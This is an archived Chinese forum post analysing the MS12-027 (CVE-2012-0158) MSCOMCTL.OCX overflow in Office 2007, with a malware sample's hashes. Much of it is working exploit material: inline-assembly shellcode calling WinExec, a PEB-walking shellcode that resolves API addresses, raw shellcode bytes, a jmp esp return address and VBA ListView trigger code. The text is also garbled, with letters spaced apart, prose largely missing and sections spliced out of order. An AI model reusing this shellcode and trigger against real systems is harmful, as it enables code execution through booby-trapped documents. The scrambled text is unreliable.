[22298] 2021-08-29_MS12-027及利用样本分析

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2021-08-29_MS12-027及利用样本分析 M S 1 2 - 0 2 7 L e m o n S e c   2 0 2 1 - 0 8 - 2 9   I D 0 x 0 0   *   O S W i n d o w s   7   S e r v i c e   P a c k   1   x 8 6 *   O f f i c e P r o f e s s i o n a l   2 0 0 7 *   M S C O M C T L . O C X 6 . 0 1 . 9 5 4 5 M S C O M C T L . O C X ( ) C V E - 2 0 1 2 - 0 1 5 8 C V E M S 1 2 - 0 2 7 0 x 0 1   C V E - 2 0 1 2 - 0 1 5 8 0 x 0 1 . 1   M S C O M C T L . O C X C O b j : : L o a d R e a d B y t e s F r o m S t r e a m P a d d e d ( ) 0 x 0 1 . 2   0 x 0 1 . 2 . a   P O C E x c e l L i s t V i e w P O C   E x c e l L i s t V i e w L i s t I t e m 使 C O b j : : L o a d V B A w i n h e x C O b j 8 E x c e l
0 x 0 1 . 2 . b   O l l y d b g E x c e l P O C E x c e l O l l y d b g 0 x 6 5 0 0 6 B   M S C O M C T L 0 x 2 7 5 c 8 a 5 6 0 x 6 5 0 0 6 B
0 x 2 7 5 C 8 A 0 5 0 x 1 8 P O C e a x E x c e l C o b j
0 x 2 7 5 C 8 A 0 5 0 x 2 7 5 C 8 7 8 D 便 0 x 1 8 0 x 1 9 P O C   0 x 2 7 5 c 8 7 c b   M S C O M C T L . O C X I D A 0 x 0 1 . 2 . c   s h e l l c o d e j m p   e s p S h e l l c o d e 0 x 8 使
( 1 )   S h e l l c o d e ( ) S t u d _ P E K e r n e l 3 2 . d l l W i n E x e c W i n E x e c ( " A A A A . e x e " ,   5 ) i n t   m a i n ( v o i d ) {         _ _ a s m {                 P U S H         E B P                 M O V           E B P ,   E S P                 X O R           E A X , E A X                 P U S H         E A X                 P U S H         6 5 7 8 6 5 2 E h       / / " . e x e "                 P U S H         4 1 4 1 4 1 4 1 h     / / " A A A A "                                                         / / 6 3 6 c 6 1 6 3                 M O V           E A X , E S P                 P U S H         5                                           P U S H         E A X                         / /   " A A A A . e x e "                 M O V           E A X , 7 7 8 3 e 5 f d h       / / W i n E x e c ( " A A A A . e x e " ,   5 )                 C A L L         E A X                 M O V           E S P , E B P                 P O P           E B P         }         r e t u r n  
5 5 8 B E C 5 5 8 B E C 3 3 C 0 5 0 6 8 2 E 6 5 7 8 6 5 6 8 4 1 4 1 4 1 4 1 8 B C 4 6 A 0 5 5 0 B 8 F D E 5 8 3 7 7 F F D 0 8 B E 5 5 D ( 2 )   S h e l l c o d e ( ) ( ) T E B K e r n e l 3 2 . d l l L o a d L i b r a r y ( ) G e t P r o c e s s A d d r e s s ( ) D L L A P I           r e t u r n   0 ; } i n t   m a i n ( v o i d ) {         _ _ a s m {                 / / k e r n e l 3 2 . d l l                       X O R   E A X ,   E A X                 M O V   E A X ,   D W O R D   P T R   F S   :   [ 0 x 3 0 ] / / P E B                 M O V   E A X ,   D W O R D   P T R   [ E A X   +   0 x C ] / / P E B _ L D R _ D A T A                 M O V   E S I ,   D W O R D   P T R   [ E A X   +   0 x 1 4 ] / /                 l o d s d                 X C H G   E A X ,   E S I                 l o d s d                 M O V   E B X ,   D W O R D   P T R   [ E A X   +   0 x 1 0 ] / / k e r n e l 3 2                 M O V   E D X ,   D W O R D   P T R   [ E B X   +   0 X 3 C ] / /  
e _ l f a n e w                 M O V   E D X ,   D W O R D   P T R   [ E B X   +   E D X   +   0 X 7 8 ]   / /   E T A                 A D D   E D X ,   E B X                 M O V   E S I ,   D W O R D   P T R   [ E D X +   0 X 2 0 ] / / n a m e s t a b l e                 A D D   E S I ,   E B X                 X O R   E C X ,   E C X G E T _ F U N C T I O N :                 I N C   E C X                 l o d s d                 A D D   E A X ,   E B X / /                   C M P   D W O R D   P T R   [ E A X ] ,   0 X 5 0 7 4 6 5 4 7                 J N Z   G E T _ F U N C T I O N                 C M P   D W O R D   P T R   [ E A X   +   0 X 4 ] ,   0 x 4 1 6 3 6 f 7 2                 J N Z   G E T _ F U N C T I O N                 C M P   D W O R D   P T R   [ E A X   +   0 X 8 ] ,   0 x 6 5 7 2 6 4 6 4                 J N Z   G E T _ F U N C T I O N                 M O V   E S I ,   [ E D X   +   0 X 2 4 ]                 A D D   E S I ,   E B X                 M O V   C X ,   W O R D   P T R   [ E S I   +   E C X   *   2 ]
                D E C   E C X                 M O V   E S I ,   D W O R D   P T R   [ E D X   +   0 X 1 C ]                 A D D   E S I ,   E B X                 M O V   E D X ,   D W O R D   P T R   [ E S I   +   E C X   *   4 ]                 A D D   E D X ,   E B X   / / G E T p r o c A d d r e s s                 X O R   E C X ,   E C X                 p u s h   0 X 0 0 6 3 6 5 7 8   / / x e c                 P U S H   0 X 4 5 6 E 6 9 5 7   / / W i n E                 P U S H   E S P                 P U S H   E B X                 C A L L   E D X                 X O R   E C X , E C X                 P U S H   E C X                 P U S H   0 X 6 5 7 8 6 5 2 E       / / " . e x e "                 P U S H   0 X 4 1 4 1 4 1 4 1     / / " A A A A "                                                 / / 6 3 6 c 6 1 6 3                 M O V    
P O C S h e l l c o d e E B X , E S P                 P U S H   5                                           P U S H   E B X                               C A L L   E A X         }         r e t u r n   0 ; } D i m   L 1   A s   L i s t I t e m D i m   k e y 1   A s   S t r i n g D i m   i   A s   I n t e g e r i   =   0 k e y 1   =   " k e y 1 " W h i l e   ( i   <   2 0 )         k e y 1   =   k e y 1   +   k e y 1         i   =   i   +   1 W e n d ' M s g B o x   ( k e y 1 ) S e t   L 1   =   L i s t V i e w 1 . L i s t I t e m s . A d d ( 1 ,   k e y 1   +   " 1 " ,   " t e s t 1 " ,   0 ,  
0 x 0 1 . 3   0 x 0 1 . 3 . a   N A M E :   m a l w a r e _ 1 2 6 4 . d o c M D 5 :   F 3 9 3 F D C 7 F 3 8 5 3 B C 7 C 4 3 5 C 1 3 A 4 9 6 2 C 6 8 8 S H A 1 :   4 8 5 1 0 7 5 4 C 8 F D 9 1 E 3 C D 5 9 3 0 A F 7 A E 7 5 5 D 4 A A 2 B 6 D 2 9 0 x 0 1 . 3 . b   0 x 2 7 5 c 8 a 5 6 j m p   e s p S h e l l c o d e T E B k e r n e l 3 2 . d l l A P I 0 ) S e t   L 2   =   L i s t V i e w 1 . L i s t I t e m s . A d d ( 2 ,   k e y 1   +   " 2 " ,   " t e s t 2 " ,   0 ,   0 ) S e t   L 3   =   L i s t V i e w 1 . L i s t I t e m s . A d d ( 3 ,   k e y 1   +   " 3 " ,   " t e s t 3 " ,   0 ,   0 )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则